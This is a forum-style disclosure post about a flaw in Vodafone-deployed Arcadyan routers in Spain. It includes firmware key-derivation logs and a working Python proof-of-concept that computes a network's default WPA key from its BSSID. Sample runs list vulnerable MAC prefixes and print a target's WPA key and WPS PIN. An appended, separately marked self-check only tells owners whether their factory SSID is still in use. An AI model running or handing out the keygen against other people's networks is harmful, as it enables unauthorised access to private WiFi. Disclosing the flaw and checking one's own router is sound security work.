Code:
git clone https://bitbucket.org/dudux/vodafonearcadyanspain.git
More details at:
http://ednolo.alumnos.upv.es/?p=1760
Code:
Background
Around 2011 some routers manufactured by the company Arcadyan were reverse engineered by the staff of seguridadwireless.net. That research came from a user called MrFoffly or something like that. This guy obtained an interesting log from an update of Ya.com: he took a firmware image and applied XOR FF in raw mode, obtaining the following logs. Many routers could be affected by the same vulnerability in the future if this company keeps using the same public and patented algorithms.
##!![E-BOOTPARAM-WRITE] User settings are not stored!!
###[BUILD-WEP] (Z1 Z2 Z3): %1X%1X%1X
##[BUILD-WEP] (x[1] XOR z[2])=(%1X XOR %1X)=%1X
##[BUILD-WEP] (y[2] XOR y[3]) =(%1X XOR %1X)=%1X
#[BUILD-WEP] (x[3] XOR y[1]) =(%1X XOR %1X)=%1X
####[BUILD-WEP] (x[2] XOR z[3]) =(%1X XOR %1X)=%1X
####[BUILD-WEP] (w[0] w[1] w[2] w[3]): %1X%1X%1X%1X
####%1X%1X%1X%1X%1X%1X%1X%1X%1X%1X%1X%1X%1X#[BUILD-WEP]: Key:%s
####[BUILD-WEP] K1,2:[%1X,%1X]
#[BUILD-WEP] (K1 XOR S10)=(%1X XOR %1X)=%1X
#[BUILD-WEP] (K1 XOR S9) =(%1X XOR %1X)=%1X
#[BUILD-WEP] (K1 XOR S8) =(%1X XOR %1X)=%1X
#[BUILD-WEP] (X1 X2 X3): %1X%1X%1X
##[BUILD-WEP] (K2 XOR M10)=(%1X XOR %1X)=%1X
#[BUILD-WEP] (K2 XOR M11)=(%1X XOR %1X)=%1X
#[BUILD-WEP] (K2 XOR M12)=(%1X XOR %1X)=%1X
#[BUILD-WEP] (Y1 Y2 Y3): %1X%1X%1X
##[BUILD-WEP] (M11 XOR S10)=(%1X XOR %1X)=%1X
####Boot Parameters NOT found !!!
##Bootcode version: %s
###Serial number: %s
##Hardware version: %s
###%02X%02X%02X%02X%02X%02X####strWlanMacAddr:%s
##WLAN%c%c%c%c%c%c####[BUILD-WEP] S6,7,8,9,10:[%1X,%1X,%1X,%1X,%1X]
##[BUILD-WEP] M7,8,9,10,11,12:[%1X,%1X,%1X,%1X,%1X,%1X]
##!!! Invalid wireless channel range %d ~ %d
#!!! Use default value %d ~ %d
##default route: %d.%d.%d.%d
#ifno:%d enableOS:%d enableWEP:%d enableSSN:%d
#!!No configuration file present!!
##!!Cleanup configuration in flash memory!!
##%s> flash version:[%s], [%d.%d.%d]
#etcpip_init_config##Jan 18 2008#16:39:45####Set flash memory layout to #BRN-BOOT####Boot Parameters found !!!
##01234567####[BUILD-WEP] (M12 XOR S9) =(%1X XOR %1X)=%1X
####[BUILD-WEP] (K1 XOR K2) =(%1X XOR %1X)=%1X
####!![E-CFG-VER] Reconfiguration required!!
After that, some of us were a bit stuck, but another user, Mambostar, managed to figure out the algorithm in order to generate 10 possible keys by using the logs as well as the patents [Look at references]. Two years later, some German researchers reverse engineered some Easybox routers, finding the same problems. Using either this algorithm or the patents as well, many routers were exposed all around Germany. One year later, more or less 2013-2014, and unfortunately, this algorithm has come back to hit some Spanish routers deployed by Vodafone, actually this model ARV752DPW. However, really not many of Vodafone's routers have been affected by this vulnerability.
Proof-of-concept
Here is a proof-of-concept of this vulnerability, which I coded due to a small difference in the algorithm. Plenty of code has been reused from previous scripts; please take a look at the credits in the code. So far the only difference noticed has been the swapping of zeros for ones at the end of the key generation algorithm, and other very weird stuff like the use of non-hexadecimal characters in the ESSID. If any zero is detected in the fifth or sixth byte of the BSSID, it is automatically transformed into G for the ESSID.
Code:
import sys

def algorithm(mac):
    '''Sebastian Petters. Changes: Added exceptions and leave out some variables pointless'''
    try:
        octets = [int(x, 16) for x in mac.split(':')]
        # Last two BSSID bytes as a 16-bit number, written out as five decimal digits
        c1 = (octets[-2] << 8) + octets[-1]
        (s6, s7, s8, s9, s10) = [int(x) for x in '%05d' % (c1)]
        # Last four hex nibbles of the BSSID
        (m9, m10, m11, m12) = [int(x, 16) for x in mac.replace(':', '')[8:]]
    except (ValueError, IndexError):
        sys.stderr.write("[!] Check your bssid! Format XX:XX:XX:XX:XX:XX\n")
        sys.exit(1)
    k1 = (s7 + s8 + m11 + m12) & 0x0F
    k2 = (m9 + m10 + s9 + s10) & 0x0F
    x1 = k1 ^ s10
    x2 = k1 ^ s9
    x3 = k1 ^ s8
    y1 = k2 ^ m10
    y2 = k2 ^ m11
    y3 = k2 ^ m12
    z1 = m11 ^ s10
    z2 = m12 ^ s9
    z3 = k1 ^ k2
    wpa = "%X%X%X%X%X%X%X%X%X" % (x1, y1, z1, x2, y2, z2, x3, y3, z3)
    # Spanish modification in this algorithm: every zero becomes a one
    wpa = wpa.replace("0", "1")
    return wpa
Code:
$ python vodafoneArcadyanSpain.py -h
usage: vodafoneArcadyanSpain.py [-h] [-b [BSSID]] [-v] [-l]
>>> PoC keygen for WiFi Networks deployed by Vodafone Arcadyan in Spain. So
far only WiFi networks with well-known bssids and essid like VodafoneXXXX are
likely vulnerable. See http://ednolo.alumnos.upv.es/ for more details.
Twitter: @enovella_ and email: ednolo[at]inf.upv.es
optional arguments:
-h, --help show this help message and exit
-v, --version show program's version number and exit
-l, --list List all vulnerable mac address (essid VodafoneXXXX)
required:
-b [BSSID], --bssid [BSSID]
Target mac address
(+) Help: Send me bugs or new targets. Credits buckynet as usual
$ python vodafoneArcadyanSpain.py -l
[+] Possible vulnerable targets:
bssid: 74:31:70:xx:xx:xx essid: VodafoneXXXX
bssid: 84:9C:A6:xx:xx:xx essid: VodafoneXXXX
bssid: 88:03:55:xx:xx:xx essid: VodafoneXXXX
bssid: 1C:C6:3C:xx:xx:xx essid: VodafoneXXXX
bssid: 50:7E:5D:xx:xx:xx essid: VodafoneXXXX
bssid: 00:12:BF:xx:xx:xx essid: VodafoneXXXX
$ python vodafoneArcadyanSpain.py -b 74:31:70:33:00:11
[+] SSID : VodafoneGG11
[+] BSSID : 74:31:70:33:00:11
[+] WPA KEY : 58639129A
[+] WPS PIN : 75944988
What a joy to see *dudux
https://foro.elhacker.net/hacking_wireless/cuidado_con_los_que_tengais_un_router_vodafone-t406822.0.html
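Added example, not part of the post or of dudux's tool: a self-check a router owner can run to see whether their own access point still matches the affected pattern described above (one of the OUIs from the -l listing and a factory ESSID of the form VodafoneXXXX with zeros in bytes 5 and 6 rendered as G). It does not compute any key; it only tells you whether the factory SSID is still in use so you know to change SSID and passphrase. Assumption: the 0-to-G substitution applies to every nibble of bytes 5 and 6, as in the post's VodafoneGG11 example; the function names and the sample pair are constructed here.

```python
import re

# OUI prefixes (first three BSSID bytes) copied from the tool's -l listing above.
AFFECTED_OUIS = {"74:31:70", "84:9C:A6", "88:03:55", "1C:C6:3C", "50:7E:5D", "00:12:BF"}

MAC_RE = re.compile(r"^([0-9A-Fa-f]{2}:){5}[0-9A-Fa-f]{2}$")


def parse_bssid(bssid):
    """Validate a BSSID and normalise it to upper-case colon-separated form."""
    if not MAC_RE.match(bssid):
        raise ValueError("BSSID must look like XX:XX:XX:XX:XX:XX")
    return bssid.upper()


def expected_essid(bssid):
    """Derive the factory ESSID the post describes: 'Vodafone' followed by the
    hex of bytes 5 and 6, with each '0' replaced by the non-hex letter 'G'.
    Assumption (from the VodafoneGG11 example): the replacement is per nibble."""
    b = parse_bssid(bssid)
    tail = b[12:14] + b[15:17]  # bytes 5 and 6 without the separating colon
    return "Vodafone" + tail.replace("0", "G")


def assess(bssid, essid):
    """Classify your own access point. Returns the findings as a dict so the
    caller (or a test) can act on them rather than parse printed text."""
    b = parse_bssid(bssid)
    oui = b[:8]
    derived = expected_essid(b)
    in_oui_list = oui in AFFECTED_OUIS
    essid_matches = essid == derived
    if in_oui_list and essid_matches:
        verdict = "likely affected: factory SSID still in use; change SSID and passphrase"
    elif in_oui_list:
        verdict = "affected hardware family, SSID already changed; make sure the passphrase is not the factory one"
    else:
        verdict = "OUI not in the published list"
    return {
        "oui": oui,
        "in_oui_list": in_oui_list,
        "expected_essid": derived,
        "essid_matches": essid_matches,
        "verdict": verdict,
    }


if __name__ == "__main__":
    # Constructed sample pair, matching the BSSID/SSID shown in the post's output.
    for k, v in assess("74:31:70:33:00:11", "VodafoneGG11").items():
        print("%-15s %s" % (k, v))
```

Run it with your router's BSSID (printed on the label or in its admin page) and the SSID it currently broadcasts; a "likely affected" verdict means the factory configuration is still in place and the default passphrase should be replaced with a random one.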